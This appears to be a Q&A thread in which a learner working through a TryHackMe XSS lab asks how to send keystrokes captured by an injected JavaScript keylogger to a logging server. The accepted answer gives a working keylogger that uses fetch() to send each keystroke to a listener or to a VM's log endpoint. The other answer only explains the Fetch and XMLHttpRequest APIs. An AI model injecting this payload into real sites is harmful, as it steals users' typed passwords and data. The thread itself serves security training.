# Send Javascript data to SimpleHTTPServer

Tags: javascript, xss, simplehttpserver

I'm doing the xss challenge on tryhackme.com (https://tryhackme.com/room/xss). The 7th task asks me to use a simple keylogger

```
 <script type="text/javascript">
 let l = "";
 document.onkeypress = function (e) {
   l += e.key;
   console.log(l);
 }
</script>
```

and send the input to `http://<vm ip>/log/<this data will be logged>` as that will log the keystrokes which can be viewed by going to `http://<vm ip>/logs`. I have tried things such as `window.location`, but can't get it to work.

For further learning, I'd also like to send the data to my `SimpleHTTPServer` running on port `8000`, so that the keys would be displayed in my terminal as they are typed on the webpage. I cannot get this to work.

Could someone please show me how to do this?

No, I am not being malicious. I am learning as I'd like to  work in cyber security. If I was being malicious I'd just use scripts I'd find on GitHub or something without understanding how they work.

Thank you.

Answer (score 1, accepted):

As SimpleHTTPServer logs every request it receives, you can use [fetch()](https://developers.google.com/web/updates/2015/03/introduction-to-fetch) to make a GET request and pass the data within it.

```
<script type="text/javascript">
    let l = "";
    document.onkeypress = function (e) {
      l += e.key;
      console.log(l);

       fetch(`http://127.0.0.1:8000?logger=${l}`, { mode: 'no-cors'});
    }
</script>
```

This would give you something like this:
[image]

For sending the data to the VM you could use fetch too, being it something like this:

```
fetch(`http://VM_IP/log/${l}`, { mode: 'no-cors'});
```

Answer (score 1):

Excluding many packaging resources, you can use a simple WEB API to achieve this purpose. Here I briefly introduce two WEB APIs

**Fetch API**

> The [Fetch API](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API) provides a JavaScript interface for accessing and
> manipulating parts of the HTTP pipeline, such as requests and
> responses.

```
fetch('http://example.com/movies.json')
  .then(function(response) {
    return response.json();
  })
  .then(function(myJson) {
    console.log(myJson);
  });
```

**XMLHttpRequest API**

> [XMLHttpRequest](http://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) (XHR) objects are used to interact with servers. You
> can retrieve data from a URL without having to do a full page refresh.
> This enables a Web page to update just part of a page without
> disrupting what the user is doing.

```
function reqListener () {
  console.log(this.responseText);
}
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "http://www.example.org/example.txt");
oReq.send();
```